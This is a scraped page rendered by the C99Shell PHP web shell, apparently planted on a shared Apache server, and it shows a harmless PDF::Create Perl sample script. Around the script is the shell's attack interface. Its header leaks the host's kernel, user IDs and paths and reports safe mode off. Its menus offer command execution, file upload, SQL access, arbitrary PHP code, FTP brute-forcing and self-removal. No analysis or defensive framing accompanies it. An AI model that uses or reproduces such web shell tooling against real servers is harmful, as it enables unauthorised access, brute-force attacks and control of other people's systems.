!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.3.27 

uname -a: Linux pdx1-shared-a4-04 6.6.104-grsec-jammy+ #3 SMP Tue Sep 16 00:28:11 UTC 2025 x86_64 

uid=6659440(dh_z2jmpm) gid=2086089(pg10499364) groups=2086089(pg10499364)  

Safe-mode: OFF (not secure)

/usr/share/doc/libpdf-create-perl/examples/   drwxr-xr-x
Free 672.04 GB of 879.6 GB (76.4%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     sample.pl (1.96 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |

# PDF::Create sample usage

use strict; use warnings;
use PDF::Create;

my $pdf = new PDF::Create(
    'filename' => 'sample.pdf',
    'Version'  => 1.2,
    'PageMode' => 'UseOutlines',
    'Author'   => 'John Doe',
    'Title'    => 'Sample Document'
);

my $root = $pdf->new_page('MediaBox' => $pdf->get_page_size('a4'));

# Prepare 2 fonts
my $font1 = $pdf->font(
    'Subtype'  => 'Type1',
    'Encoding' => 'WinAnsiEncoding',
    'BaseFont' => 'Helvetica'
);
my $font2 = $pdf->font(
    'Subtype'  => 'Type1',
    'Encoding' => 'WinAnsiEncoding',
    'BaseFont' => 'Helvetica-Bold'
);

# Add a page which inherits its attributes from $root
my $page1 = $root->new_page;

# Prepare a Table of Content
my $toc = $pdf->new_outline('Title' => 'Sample Document');

# Add an entry to the outline
$toc->new_outline('Title' => 'Page 1', 'Destination' => $page1);

# Write some text to the page
$page1->stringc($font2, 40, 306, 426, 'PDF::Create');
$page1->stringc($font1, 20, 306, 396, "version $PDF::Create::VERSION");
$page1->stringc($font1, 20, 300, 300, 'Fabien Tassin');
$page1->stringc($font1, 20, 300, 250, 'Markus Baertschi ([email protected])');

# Add another page
my $page2 = $root->new_page;
my $s2 = $toc->new_outline('Title' => 'Page 2', 'Destination' => $page2);
$s2->new_outline('Title' => 'GIF');
$s2->new_outline('Title' => 'JPEG');

# Draw a border around the page (A4 max is 595/842)
$page2->line(10,  10,  10,  832);
$page2->line(10,  10,  585, 10);
$page2->line(10,  832, 585, 832);
$page2->line(585, 10,  585, 832);

# Add a gif image
$page2->string($font1, 20, 50, 600, 'GIF Image:');
my $image1 = $pdf->image('pdf-logo.gif');
$page2->image('image'=>$image1, 'xscale'=>0.2, 'yscale'=>0.2, 'xpos'=>200, 'ypos'=>600);

# Add a jpeg image
$page2->string($font1, 20, 50, 500, 'JPEG Image:');
my $image2 = $pdf->image('pdf-logo.jpg');
$page2->image('image'=>$image2, 'xscale'=>0.2,'yscale'=>0.2, 'xpos'=>200, 'ypos'=>500);

# Wrap up the PDF and close the file
$pdf->close;

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0124 ]--